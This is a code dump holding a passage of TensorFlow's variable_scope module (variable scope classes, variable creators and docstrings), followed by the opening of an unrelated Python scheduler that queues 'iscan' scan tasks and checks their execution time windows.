value of unknown shape. If True, the default, the shape of initial_value
must be known.
use_resource: If False, creates a regular Variable. If True, creates an
experimental ResourceVariable instead which has well-defined semantics.
Defaults to False (will later change to True).
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
synchronization: Indicates when a distributed a variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize. If `synchronization` is set to `ON_READ`,
`trainable` must not be set to `True`.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
Returns:
A tuple `(shards, partitions)` where `shards` is the list of `Variable`
shards and `partitions` is the output of the partitioner on the input
shape.
Raises:
ValueError: when creating a new variable and shape is not declared,
or when violating reuse during variable creation. Reuse is set inside
`variable_scope`.
"""
# pylint: disable=protected-access
scope = get_variable_scope()
if scope.custom_getter is not None:
raise ValueError(
"Private access to _get_partitioned_variable is not allowed when "
"a custom getter is set. Current custom getter: %s. "
"It is likely that you're using create_partitioned_variables. "
"If so, consider instead using get_variable with a non-empty "
"partitioner parameter instead." % scope.custom_getter)
return scope._get_partitioned_variable(
_get_default_variable_store(),
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# pylint: enable=protected-access
# Named like a function for compatibility with the previous
# @tf_contextlib.contextmanager definition.
class _pure_variable_scope(object): # pylint: disable=invalid-name
"""A context for the variable_scope, see `variable_scope` for docs."""
def __init__(self,
name_or_scope,
reuse=None,
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
old_name_scope=None,
dtype=dtypes.float32,
use_resource=None,
constraint=None):
"""Creates a context for the variable_scope, see `variable_scope` for docs.
Note: this does not create a name scope.
Args:
name_or_scope: `string` or `VariableScope`: the scope to open.
reuse: `True` or None, or tf.AUTO_REUSE; if `None`, we inherit the parent
scope's reuse flag.
initializer: default initializer for variables within this scope.
regularizer: default regularizer for variables within this scope.
caching_device: default caching device for variables within this scope.
partitioner: default partitioner for variables within this scope.
custom_getter: default custom getter for variables within this scope.
old_name_scope: the original name scope when re-entering a variable scope.
dtype: type of the variables within this scope (defaults to `DT_FLOAT`).
use_resource: If False, variables in this scope will be regular Variables.
If True, experimental ResourceVariables will be creates instead, with
well-defined semantics. Defaults to False (will later change to True).
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
"""
self._name_or_scope = name_or_scope
self._reuse = reuse
self._initializer = initializer
self._regularizer = regularizer
self._caching_device = caching_device
self._partitioner = partitioner
self._custom_getter = custom_getter
self._old_name_scope = old_name_scope
self._dtype = dtype
self._use_resource = use_resource
self._constraint = constraint
self._var_store = _get_default_variable_store()
self._var_scope_store = get_variable_scope_store()
if isinstance(self._name_or_scope, VariableScope):
self._new_name = self._name_or_scope.name
name_scope = self._name_or_scope._name_scope # pylint: disable=protected-access
# Handler for the case when we jump to a shared scope. We create a new
# VariableScope (self._var_scope_object) that contains a copy of the
# provided shared scope, possibly with changed reuse and initializer, if
# the user requested this.
variable_scope_object = VariableScope(
self._name_or_scope.reuse if not self._reuse else self._reuse,
name=self._new_name,
initializer=self._name_or_scope.initializer,
regularizer=self._name_or_scope.regularizer,
caching_device=self._name_or_scope.caching_device,
partitioner=self._name_or_scope.partitioner,
dtype=self._name_or_scope.dtype,
custom_getter=self._name_or_scope.custom_getter,
name_scope=name_scope,
use_resource=self._name_or_scope.use_resource,
constraint=self._constraint)
if self._initializer is not None:
variable_scope_object.set_initializer(self._initializer)
if self._regularizer is not None:
variable_scope_object.set_regularizer(self._regularizer)
if self._caching_device is not None:
variable_scope_object.set_caching_device(self._caching_device)
if self._partitioner is not None:
variable_scope_object.set_partitioner(self._partitioner)
if self._custom_getter is not None:
variable_scope_object.set_custom_getter(
_maybe_wrap_custom_getter(
self._custom_getter, self._name_or_scope.custom_getter))
if self._dtype is not None:
variable_scope_object.set_dtype(self._dtype)
if self._use_resource is not None:
variable_scope_object.set_use_resource(self._use_resource)
self._cached_variable_scope_object = variable_scope_object
def __enter__(self):
"""Begins the scope block.
Returns:
A VariableScope.
Raises:
ValueError: when trying to reuse within a create scope, or create within
a reuse scope, or if reuse is not `None` or `True`.
TypeError: when the types of some arguments are not appropriate.
"""
self._old = self._var_scope_store.current_scope
if isinstance(self._name_or_scope, VariableScope):
self._var_scope_store.open_variable_scope(self._new_name)
self._old_subscopes = copy.copy(
self._var_scope_store.variable_scopes_count)
variable_scope_object = self._cached_variable_scope_object
else:
# Handler for the case when we just prolong current variable scope.
# VariableScope with name extended by the provided one, and inherited
# reuse and initializer (except if the user provided values to set).
self._new_name = (
self._old.name + "/" + self._name_or_scope if self._old.name
else self._name_or_scope)
self._reuse = (self._reuse
or self._old.reuse) # Re-using is inherited by sub-scopes.
if self._old_name_scope is None:
name_scope = self._name_or_scope
else:
name_scope = self._old_name_scope
variable_scope_object = VariableScope(
self._reuse,
name=self._new_name,
initializer=self._old.initializer,
regularizer=self._old.regularizer,
caching_device=self._old.caching_device,
partitioner=self._old.partitioner,
dtype=self._old.dtype,
use_resource=self._old.use_resource,
custom_getter=self._old.custom_getter,
name_scope=name_scope,
constraint=self._constraint)
if self._initializer is not None:
variable_scope_object.set_initializer(self._initializer)
if self._regularizer is not None:
variable_scope_object.set_regularizer(self._regularizer)
if self._caching_device is not None:
variable_scope_object.set_caching_device(self._caching_device)
if self._partitioner is not None:
variable_scope_object.set_partitioner(self._partitioner)
if self._custom_getter is not None:
variable_scope_object.set_custom_getter(
_maybe_wrap_custom_getter(self._custom_getter,
self._old.custom_getter))
if self._dtype is not None:
variable_scope_object.set_dtype(self._dtype)
if self._use_resource is not None:
variable_scope_object.set_use_resource(self._use_resource)
self._var_scope_store.open_variable_scope(self._new_name)
self._var_scope_store.current_scope = variable_scope_object
return variable_scope_object
def __exit__(self, type_arg, value_arg, traceback_arg):
# If jumping out from a non-prolonged scope, restore counts.
if isinstance(self._name_or_scope, VariableScope):
self._var_scope_store.variable_scopes_count = self._old_subscopes
else:
self._var_scope_store.close_variable_subscopes(self._new_name)
self._var_scope_store.current_scope = self._old
def _maybe_wrap_custom_getter(custom_getter, old_getter):
"""Wrap a call to a custom_getter to use the old_getter internally."""
if old_getter is None:
return custom_getter
# The new custom_getter should call the old one
def wrapped_custom_getter(getter, *args, **kwargs):
# Call:
# custom_getter(
# lambda: old_getter(true_getter, ...), *args, **kwargs)
# which means custom_getter will call old_getter, which
# will call the true_getter, perform any intermediate
# processing, and return the results to the current
# getter, which will also perform additional processing.
return custom_getter(
functools.partial(old_getter, getter),
*args, **kwargs)
return wrapped_custom_getter
def _get_unique_variable_scope(prefix):
"""Get a name with the given prefix unique in the current variable scope."""
var_scope_store = get_variable_scope_store()
current_scope = get_variable_scope()
name = current_scope.name + "/" + prefix if current_scope.name else prefix
if var_scope_store.variable_scope_count(name) == 0:
return prefix
idx = 1
while var_scope_store.variable_scope_count(name + ("_%d" % idx)) > 0:
idx += 1
return prefix + ("_%d" % idx)
# Named like a function for backwards compatibility with the
# @tf_contextlib.contextmanager version, which was switched to a class to avoid
# some object creation overhead.
@tf_export(v1=["variable_scope"]) # pylint: disable=invalid-name
class variable_scope(object):
"""A context manager for defining ops that creates variables (layers).
This context manager validates that the (optional) `values` are from the same
graph, ensures that graph is the default graph, and pushes a name scope and a
variable scope.
If `name_or_scope` is not None, it is used as is. If `name_or_scope` is None,
then `default_name` is used. In that case, if the same name has been
previously used in the same scope, it will be made unique by appending `_N`
to it.
Variable scope allows you to create new variables and to share already created
ones while providing checks to not create or share by accident. For details,
see the [Variable Scope How To](https://tensorflow.org/guide/variables), here
we present only a few basic examples.
Simple example of how to create a new variable:
```python
with tf.variable_scope("foo"):
with tf.variable_scope("bar"):
v = tf.get_variable("v", [1])
assert v.name == "foo/bar/v:0"
```
Simple example of how to reenter a premade variable scope safely:
```python
with tf.variable_scope("foo") as vs:
pass
# Re-enter the variable scope.
with tf.variable_scope(vs,
auxiliary_name_scope=False) as vs1:
# Restore the original name_scope.
with tf.name_scope(vs1.original_name_scope):
v = tf.get_variable("v", [1])
assert v.name == "foo/v:0"
c = tf.constant([1], name="c")
assert c.name == "foo/c:0"
```
Basic example of sharing a variable AUTO_REUSE:
```python
def foo():
with tf.variable_scope("foo", reuse=tf.AUTO_REUSE):
v = tf.get_variable("v", [1])
return v
v1 = foo() # Creates v.
v2 = foo() # Gets the same, existing v.
assert v1 == v2
```
Basic example of sharing a variable with reuse=True:
```python
with tf.variable_scope("foo"):
v = tf.get_variable("v", [1])
with tf.variable_scope("foo", reuse=True):
v1 = tf.get_variable("v", [1])
assert v1 == v
```
Sharing a variable by capturing a scope and setting reuse:
```python
with tf.variable_scope("foo") as scope:
v = tf.get_variable("v", [1])
scope.reuse_variables()
v1 = tf.get_variable("v", [1])
assert v1 == v
```
To prevent accidental sharing of variables, we raise an exception when getting
an existing variable in a non-reusing scope.
```python
with tf.variable_scope("foo"):
v = tf.get_variable("v", [1])
v1 = tf.get_variable("v", [1])
# Raises ValueError("... v already exists ...").
```
Similarly, we raise an exception when trying to get a variable that does not
exist in reuse mode.
```python
with tf.variable_scope("foo", reuse=True):
v = tf.get_variable("v", [1])
# Raises ValueError("... v does not exists ...").
```
Note that the `reuse` flag is inherited: if we open a reusing scope, then all
its sub-scopes become reusing as well.
A note about name scoping: Setting `reuse` does not impact the naming of other
ops such as mult. See related discussion on
[github#6189](https://github.com/tensorflow/tensorflow/issues/6189)
Note that up to and including version 1.0, it was allowed (though explicitly
discouraged) to pass False to the reuse argument, yielding undocumented
behaviour slightly different from None. Starting at 1.1.0 passing None and
False as reuse has exactly the same effect.
A note about using variable scopes in multi-threaded environment: Variable
scopes are thread local, so one thread will not see another thread's current
scope. Also, when using `default_name`, unique scopes names are also generated
only on a per thread basis. If the same name was used within a different
thread, that doesn't prevent a new thread from creating the same scope.
However, the underlying variable store is shared across threads (within the
same graph). As such, if another thread tries to create a new variable with
the same name as a variable created by a previous thread, it will fail unless
reuse is True.
Further, each thread starts with an empty variable scope. So if you wish to
preserve name prefixes from a scope from the main thread, you should capture
the main thread's scope and re-enter it in each thread. For e.g.
```
main_thread_scope = variable_scope.get_variable_scope()
# Thread's target function:
def thread_target_fn(captured_scope):
with variable_scope.variable_scope(captured_scope):
# .... regular code for this thread
thread = threading.Thread(target=thread_target_fn, args=(main_thread_scope,))
```
"""
def __init__(self,
name_or_scope,
default_name=None,
values=None,
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
reuse=None,
dtype=None,
use_resource=None,
constraint=None,
auxiliary_name_scope=True):
"""Initialize the context manager.
Args:
name_or_scope: `string` or `VariableScope`: the scope to open.
default_name: The default name to use if the `name_or_scope` argument is
`None`, this name will be uniquified. If name_or_scope is provided it
won't be used and therefore it is not required and can be None.
values: The list of `Tensor` arguments that are passed to the op function.
initializer: default initializer for variables within this scope.
regularizer: default regularizer for variables within this scope.
caching_device: default caching device for variables within this scope.
partitioner: default partitioner for variables within this scope.
custom_getter: default custom getter for variables within this scope.
reuse: `True`, None, or tf.AUTO_REUSE; if `True`, we go into reuse mode
for this scope as well as all sub-scopes; if tf.AUTO_REUSE, we create
variables if they do not exist, and return them otherwise; if None, we
inherit the parent scope's reuse flag. When eager execution is enabled,
new variables are always created unless an EagerVariableStore or
template is currently active.
dtype: type of variables created in this scope (defaults to the type
in the passed scope, or inherited from parent scope).
use_resource: If False, all variables will be regular Variables. If True,
experimental ResourceVariables with well-defined semantics will be used
instead. Defaults to False (will later change to True). When eager
execution is enabled this argument is always forced to be True.
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
auxiliary_name_scope: If `True`, we create an auxiliary name scope with
the scope. If `False`, we don't create it. Note that the argument is
not inherited, and it only takes effect for once when creating. You
should only use it for re-entering a premade variable scope.
Returns:
A scope that can be captured and reused.
Raises:
ValueError: when trying to reuse within a create scope, or create within
a reuse scope.
TypeError: when the types of some arguments are not appropriate.
"""
self._name_or_scope = name_or_scope
self._default_name = default_name
self._values = values
self._initializer = initializer
self._regularizer = regularizer
self._caching_device = caching_device
self._partitioner = partitioner
self._custom_getter = custom_getter
self._reuse = reuse
self._dtype = dtype
self._use_resource = use_resource
self._constraint = constraint
if self._default_name is None and self._name_or_scope is None:
raise TypeError("If default_name is None then name_or_scope is required")
if self._reuse is False:
# We don't allow non-inheriting scopes, False = None here.
self._reuse = None
if not (self._reuse is True
or self._reuse is None
or self._reuse is AUTO_REUSE):
raise ValueError("The reuse parameter must be True or False or None.")
if self._values is None:
self._values = []
self._in_graph_mode = not context.executing_eagerly()
if self._in_graph_mode:
self._graph = ops._get_graph_from_inputs(self._values) # pylint: disable=protected-access
self._cached_pure_variable_scope = None
self._current_name_scope = None
if not isinstance(auxiliary_name_scope, bool):
raise TypeError("The auxiliary_name_scope must be `True` or `False`, "
"while get {}".format(auxiliary_name_scope))
self._auxiliary_name_scope = auxiliary_name_scope
def __enter__(self):
# If the default graph is building a function, then we should not replace it
# with the cached graph.
if ops.get_default_graph().building_function:
self._building_function = True
else:
self._building_function = False
if self._in_graph_mode and not self._building_function:
self._graph_context_manager = self._graph.as_default()
self._graph_context_manager.__enter__()
if self._cached_pure_variable_scope is not None:
# Fast path for re-entering variable_scopes. We've held on to the pure
# variable scope from a previous successful __enter__, so we avoid some
# overhead by re-using that object.
if self._current_name_scope is not None:
self._current_name_scope.__enter__()
return self._cached_pure_variable_scope.__enter__()
try:
return self._enter_scope_uncached()
except Exception:
if self._in_graph_mode and not self._building_function:
if self._graph_context_manager is not None:
self._graph_context_manager.__exit__(*sys.exc_info())
raise
def _enter_scope_uncached(self):
"""Enters the context manager when there is no cached scope yet.
Returns:
The entered variable scope.
Raises:
TypeError: A wrong type is passed as `scope` at __init__().
ValueError: `reuse` is incorrectly set at __init__().
"""
if self._auxiliary_name_scope:
# Create a new name scope later
current_name_scope = None
else:
# Reenter the current name scope
name_scope = ops.get_name_scope()
if name_scope:
# Hack to reenter
name_scope += "/"
current_name_scope = ops.name_scope(name_scope)
else:
# Root scope
current_name_scope = ops.name_scope(name_scope)
# IMPORTANT: Only assign to self._cached_pure_variable_scope and
# self._current_name_scope after successful __enter__() calls.
if self._name_or_scope is not None:
if not isinstance(self._name_or_scope,
(VariableScope,) + six.string_types):
raise TypeError("VariableScope: name_or_scope must be a string or "
"VariableScope.")
if isinstance(self._name_or_scope, six.string_types):
name_scope = self._name_or_scope
else:
name_scope = self._name_or_scope.name.split("/")[-1]
if name_scope or current_name_scope:
current_name_scope = current_name_scope or ops.name_scope(name_scope)
try:
current_name_scope_name = current_name_scope.__enter__()
except:
current_name_scope.__exit__(*sys.exc_info())
raise
self._current_name_scope = current_name_scope
if isinstance(self._name_or_scope, six.string_types):
old_name_scope = current_name_scope_name
else:
old_name_scope = self._name_or_scope.original_name_scope
pure_variable_scope = _pure_variable_scope(
self._name_or_scope,
reuse=self._reuse,
initializer=self._initializer,
regularizer=self._regularizer,
caching_device=self._caching_device,
partitioner=self._partitioner,
custom_getter=self._custom_getter,
old_name_scope=old_name_scope,
dtype=self._dtype,
use_resource=self._use_resource,
constraint=self._constraint)
try:
entered_pure_variable_scope = pure_variable_scope.__enter__()
except:
pure_variable_scope.__exit__(*sys.exc_info())
raise
self._cached_pure_variable_scope = pure_variable_scope
return entered_pure_variable_scope
else:
self._current_name_scope = None
# This can only happen if someone is entering the root variable scope.
pure_variable_scope = _pure_variable_scope(
self._name_or_scope,
reuse=self._reuse,
initializer=self._initializer,
regularizer=self._regularizer,
caching_device=self._caching_device,
partitioner=self._partitioner,
custom_getter=self._custom_getter,
dtype=self._dtype,
use_resource=self._use_resource,
constraint=self._constraint)
try:
entered_pure_variable_scope = pure_variable_scope.__enter__()
except:
pure_variable_scope.__exit__(*sys.exc_info())
raise
self._cached_pure_variable_scope = pure_variable_scope
return entered_pure_variable_scope
else: # Here name_or_scope is None. Using default name, but made unique.
if self._reuse:
raise ValueError("reuse=True cannot be used without a name_or_scope")
current_name_scope = current_name_scope or ops.name_scope(
self._default_name)
try:
current_name_scope_name = current_name_scope.__enter__()
except:
current_name_scope.__exit__(*sys.exc_info())
raise
self._current_name_scope = current_name_scope
unique_default_name = _get_unique_variable_scope(self._default_name)
pure_variable_scope = _pure_variable_scope(
unique_default_name,
initializer=self._initializer,
regularizer=self._regularizer,
caching_device=self._caching_device,
partitioner=self._partitioner,
custom_getter=self._custom_getter,
old_name_scope=current_name_scope_name,
dtype=self._dtype,
use_resource=self._use_resource,
constraint=self._constraint)
try:
entered_pure_variable_scope = pure_variable_scope.__enter__()
except:
pure_variable_scope.__exit__(*sys.exc_info())
raise
self._cached_pure_variable_scope = pure_variable_scope
return entered_pure_variable_scope
def __exit__(self, type_arg, value_arg, traceback_arg):
self._cached_pure_variable_scope.__exit__(
type_arg, value_arg, traceback_arg)
if self._current_name_scope:
self._current_name_scope.__exit__(type_arg, value_arg, traceback_arg)
if self._in_graph_mode and not self._building_function:
self._graph_context_manager.__exit__(type_arg, value_arg, traceback_arg)
# pylint: disable=g-doc-return-or-yield
@tf_export(v1=["variable_op_scope"])
@tf_contextlib.contextmanager
def variable_op_scope(values,
name_or_scope,
default_name=None,
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
reuse=None,
dtype=None,
use_resource=None,
constraint=None):
"""Deprecated: context manager for defining an op that creates variables."""
logging.warn("tf.variable_op_scope(values, name, default_name) is deprecated,"
" use tf.variable_scope(name, default_name, values)")
with variable_scope(name_or_scope,
default_name=default_name,
values=values,
initializer=initializer,
regularizer=regularizer,
caching_device=caching_device,
partitioner=partitioner,
custom_getter=custom_getter,
reuse=reuse,
dtype=dtype,
use_resource=use_resource,
constraint=constraint) as scope:
yield scope
def _compute_slice_dim_and_shape(full_shape, slicing):
"""Computes which dimension is being sliced and the typical slice shape."""
slice_shape = [0] * len(full_shape)
slice_dim = None
for dim, num_slices in enumerate(slicing):
dim_size = full_shape[dim]
if num_slices <= 0 or dim_size < num_slices:
raise ValueError("Cannot create %d slices for size %d. shape: %s, "
"slicing: %s" %
(num_slices, full_shape[dim], full_shape, slicing))
if num_slices == 1:
# Not slicing in this dimension.
slice_shape[dim] = dim_size
elif slice_dim is not None:
# We only support slicing along one of the dimensions.
raise ValueError("Can only slice a variable along one dimension: "
"shape: %s, slicing: %s" % (full_shape, slicing))
else:
# Note: We will add any extras onto the last slice, later.
slice_dim = dim
slice_shape[dim] = dim_size // num_slices
# Degenerate case: If "slicing" was all ones, pretend we are slicing along
# the first dimension.
if slice_dim is None:
slice_dim = 0
return slice_dim, slice_shape
def _get_trainable_value(synchronization, trainable):
"""Computes the trainable value based on the given arguments."""
if synchronization == VariableSynchronization.ON_READ:
if trainable:
raise ValueError(
"Synchronization value can be set to "
"VariableSynchronization.ON_READ only for non-trainable variables. "
"You have specified trainable=True and "
"synchronization=VariableSynchronization.ON_READ.")
else:
# Set trainable to be false when variable is to be synced on read.
trainable = False
elif trainable is None:
trainable = True
return trainable
def default_variable_creator(next_creator=None, **kwargs):
"""Default variable creator."""
assert next_creator is None
initial_value = kwargs.get("initial_value", None)
trainable = kwargs.get("trainable", None)
collections = kwargs.get("collections", None)
validate_shape = kwargs.get("validate_shape", True)
caching_device = kwargs.get("caching_device", None)
name = kwargs.get("name", None)
variable_def = kwargs.get("variable_def", None)
dtype = kwargs.get("dtype", None)
expected_shape = kwargs.get("expected_shape", None)
import_scope = kwargs.get("import_scope", None)
constraint = kwargs.get("constraint", None)
use_resource = kwargs.get("use_resource", None)
# Set trainable value based on synchronization value.
synchronization = kwargs.get("synchronization", VariableSynchronization.AUTO)
trainable = _get_trainable_value(
synchronization=synchronization, trainable=trainable)
if use_resource is None:
use_resource = get_variable_scope().use_resource
if use_resource is None:
use_resource = _DEFAULT_USE_RESOURCE
use_resource = use_resource or context.executing_eagerly()
if use_resource:
return resource_variable_ops.ResourceVariable(
initial_value=initial_value, trainable=trainable,
collections=collections, validate_shape=validate_shape,
caching_device=caching_device, name=name, dtype=dtype,
constraint=constraint, variable_def=variable_def,
import_scope=import_scope)
else:
return variables.RefVariable(
initial_value=initial_value, trainable=trainable,
collections=collections, validate_shape=validate_shape,
caching_device=caching_device, name=name, dtype=dtype,
constraint=constraint, variable_def=variable_def,
expected_shape=expected_shape, import_scope=import_scope)
def default_variable_creator_v2(next_creator=None, **kwargs):
"""Default variable creator."""
assert next_creator is None
initial_value = kwargs.get("initial_value", None)
trainable = kwargs.get("trainable", None)
validate_shape = kwargs.get("validate_shape", True)
caching_device = kwargs.get("caching_device", None)
name = kwargs.get("name", None)
variable_def = kwargs.get("variable_def", None)
dtype = kwargs.get("dtype", None)
import_scope = kwargs.get("import_scope", None)
constraint = kwargs.get("constraint", None)
# Set trainable value based on synchronization value.
synchronization = kwargs.get("synchronization", VariableSynchronization.AUTO)
trainable = _get_trainable_value(
synchronization=synchronization, trainable=trainable)
return resource_variable_ops.ResourceVariable(
initial_value=initial_value, trainable=trainable,
validate_shape=validate_shape, caching_device=caching_device,
name=name, dtype=dtype, constraint=constraint, variable_def=variable_def,
import_scope=import_scope)
variables.default_variable_creator = default_variable_creator
variables.default_variable_creator_v2 = default_variable_creator_v2
def _make_getter(captured_getter, captured_previous):
"""Gets around capturing loop variables in python being broken."""
return lambda **kwargs: captured_getter(captured_previous, **kwargs)
# TODO(apassos) remove forwarding symbol
variable = variables.VariableV1
@tf_export(v1=["variable_creator_scope"])
@tf_contextlib.contextmanager
def variable_creator_scope_v1(variable_creator):
"""Scope which defines a variable creation function to be used by variable().
variable_creator is expected to be a function with the following signature:
```
def variable_creator(next_creator, **kwargs)
```
The creator is supposed to eventually call the next_creator to create a
variable if it does want to create a variable and not call Variable or
ResourceVariable directly. This helps make creators composable. A creator may
choose to create multiple variables, return already existing variables, or
simply register that a variable was created and defer to the next creators in
line. Creators can also modify the keyword arguments seen by the next
creators.
Custom getters in the variable scope will eventually resolve down to these
custom creators when they do create variables.
The valid keyword arguments in kwds are:
initial_value: A `Tensor`, or Python object convertible to a `Tensor`,
which is the initial value for the Variable. The initial value must have
a shape specified unless `validate_shape` is set to False. Can also be a
callable with no argument that returns the initial value when called. In
that case, `dtype` must be specified. (Note that initializer functions
from init_ops.py must first be bound to a shape before being used here.)
trainable: If `True`, the default, also adds the variable to the graph
collection `GraphKeys.TRAINABLE_VARIABLES`. This collection is used as
the default list of variables to use by the `Optimizer` classes.
`trainable` defaults to `True` unless `synchronization` is
set to `ON_READ`.
collections: List of graph collections keys. The new variable is added to
these collections. Defaults to `[GraphKeys.GLOBAL_VARIABLES]`.
validate_shape: If `False`, allows the variable to be initialized with a
value of unknown shape. If `True`, the default, the shape of
`initial_value` must be known.
caching_device: Optional device string describing where the Variable
should be cached for reading. Defaults to the Variable's device.
If not `None`, caches on another device. Typical use is to cache
on the device where the Ops using the Variable reside, to deduplicate
copying through `Switch` and other conditional statements.
name: Optional name for the variable. Defaults to `'Variable'` and gets
uniquified automatically.
dtype: If set, initial_value will be converted to the given type.
If `None`, either the datatype will be kept (if `initial_value` is
a Tensor), or `convert_to_tensor` will decide.
constraint: A constraint function to be applied to the variable after
updates by some algorithms.
use_resource: if True, a ResourceVariable is always created.
synchronization: Indicates when a distributed a variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize. If `synchronization` is set to `ON_READ`,
`trainable` must not be set to `True`.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
This set may grow over time, so it's important the signature of creators is as
mentioned above.
Args:
variable_creator: the passed creator
Yields:
A scope in which the creator is active
"""
with ops.get_default_graph()._variable_creator_scope(variable_creator): # pylint: disable=protected-access
yield
# Note: only the docstrings differ between this and v1.
@tf_export("variable_creator_scope", v1=[])
@tf_contextlib.contextmanager
def variable_creator_scope(variable_creator):
"""Scope which defines a variable creation function to be used by variable().
variable_creator is expected to be a function with the following signature:
```
def variable_creator(next_creator, **kwargs)
```
The creator is supposed to eventually call the next_creator to create a
variable if it does want to create a variable and not call Variable or
ResourceVariable directly. This helps make creators composable. A creator may
choose to create multiple variables, return already existing variables, or
simply register that a variable was created and defer to the next creators in
line. Creators can also modify the keyword arguments seen by the next
creators.
Custom getters in the variable scope will eventually resolve down to these
custom creators when they do create variables.
The valid keyword arguments in kwds are:
initial_value: A `Tensor`, or Python object convertible to a `Tensor`,
which is the initial value for the Variable. The initial value must have
a shape specified unless `validate_shape` is set to False. Can also be a
callable with no argument that returns the initial value when called. In
that case, `dtype` must be specified. (Note that initializer functions
from init_ops.py must first be bound to a shape before being used here.)
trainable: If `True`, the default, GradientTapes automatically watch
uses of this Variable.
validate_shape: If `False`, allows the variable to be initialized with a
value of unknown shape. If `True`, the default, the shape of
`initial_value` must be known.
caching_device: Optional device string describing where the Variable
should be cached for reading. Defaults to the Variable's device.
If not `None`, caches on another device. Typical use is to cache
on the device where the Ops using the Variable reside, to deduplicate
copying through `Switch` and other conditional statements.
name: Optional name for the variable. Defaults to `'Variable'` and gets
uniquified automatically.
dtype: If set, initial_value will be converted to the given type.
If `None`, either the datatype will be kept (if `initial_value` is
a Tensor), or `convert_to_tensor` will decide.
constraint: A constraint function to be applied to the variable after
updates by some algorithms.
synchronization: Indicates when a distributed a variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize. If `synchronization` is set to `ON_READ`,
`trainable` must not be set to `True`.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
This set may grow over time, so it's important the signature of creators is as
mentioned above.
Args:
variable_creator: the passed creator
Yields:
A scope in which the creator is active
"""
with ops.get_default_graph()._variable_creator_scope(variable_creator): # pylint: disable=protected-access
yield
|
scandownloadmanager.py
|
"""
iscan task的下载分配
"""
import threading
import time
import traceback
from datetime import datetime
from queue import PriorityQueue
import pytz
from datacontract import IdownCmd, ETaskStatus, IscanTask, ECommandStatus
from idownclient.config_task import clienttaskconfig
from .scanmanagebase import ScanManageBase
from .scanplugmanager import ScanPlugManager
from ..clientdbmanager.sqlcondition import ESqlComb, SqlCondition, SqlConditions
class ScanDownloadManager(ScanManageBase):
def __init__(self):
ScanManageBase.__init__(self)
# 新任务队列
self._new_scantask_queue = PriorityQueue()
# 正在处理的任务队列
self._dealing_queue: dict = {}
# 正在处理新任务队列,如果有新任务是不会执行循环下载任务的
self._dealing_queue_locker = threading.Lock()
# 并发队列任务数
self._concur_num = clienttaskconfig.concurrent_number
# 默认配置
_defaultcmd: str = self._sqlfunc.get_default_iscan_cmd().get("cmd")
self.d_cmd = IdownCmd(_defaultcmd)
self._scan_plug_manger = ScanPlugManager()
def on_task_complete(self, task: IscanTask):
"""Task对象处理完毕的回调"""
with self._dealing_queue_locker:
if self._dealing_queue.__contains__(task.taskid):
self._dealing_queue.pop(task.taskid, None)
def _process_task_execution_time(self, q_task: dict):
"""
处理刚从数据库查出数据,检测任务是否在有效期
和任务是否满足在执行时间段
现在有这么一个问题,任务在server那边是在执行时间段中,但是到了client
就不再是在执行时间段内,在server那边增加了一个功能就是判断周期任务是否在执行时间段中
如果不在执行时间段中,那么就不再下发,而client无论如何都把最后一个周期执行完成
modify by judy 20201126
:param q_task:
:return:
"""
q_cmdid = q_task.get("cmdid")
is_effective = True
if q_cmdid is None or q_cmdid == "":
# 这里的true表示默认的任务时没有任务活性和时间限制的
# 目前来看是这样,如果使用时出问题再修改吧,judy190603
return True
cmd = IdownCmd(q_task.get("cmd"))
# 因为任务里面保存的设置可能不是完整的,所以需要使用默认设置补齐
cmd.fill_defcmd(self.d_cmd)
# iscantask也是支持周期执行的,但是同时也支持周期暂停,但是扫描程序不会有继续下载的功能,所以暂停不仅是将当前下载暂停了,更是把这个周期暂停了
# 所以如果发现字段是被暂停了的,那么就不再进行下载modify by judy 2020/07/23
if int(cmd.switch_control.download_switch) != 1:
# 暂停的任务不需要再执行,但是需要更新下数据库状态,并且将状态回馈给server
return False
# 重点区域扫描,如果是周期任务那么直接执行了,没有执行区间,只有有效时间 modify by judy 20201126
if int(cmd.stratagy.circulation_mode) == 2:
return True
# 每个任务都去判断一下并发数
if int(cmd.stratagy.concur_num) != self._concur_num:
self._concur_num = int(cmd.stratagy.concur_num)
# 统一使用东8区的时间
beijing = pytz.timezone("Asia/Shanghai")
now_datetime = datetime.now(beijing)
now_time = now_datetime.time()
try:
if cmd.stratagy.time_start is not None:
task_time_start = datetime.strptime(
cmd.stratagy.time_start, "%Y-%m-%d %H:%M:%S"
)
if now_datetime >= beijing.localize(task_time_start):
is_effective = True
else:
return False
if cmd.stratagy.time_end is not None:
task_time_end = datetime.strptime(
cmd.stratagy.time_end, "%Y-%m-%d %H:%M:%S"
)
if now_datetime <= beijing.localize(task_time_end):
is_effective = True
else:
return False
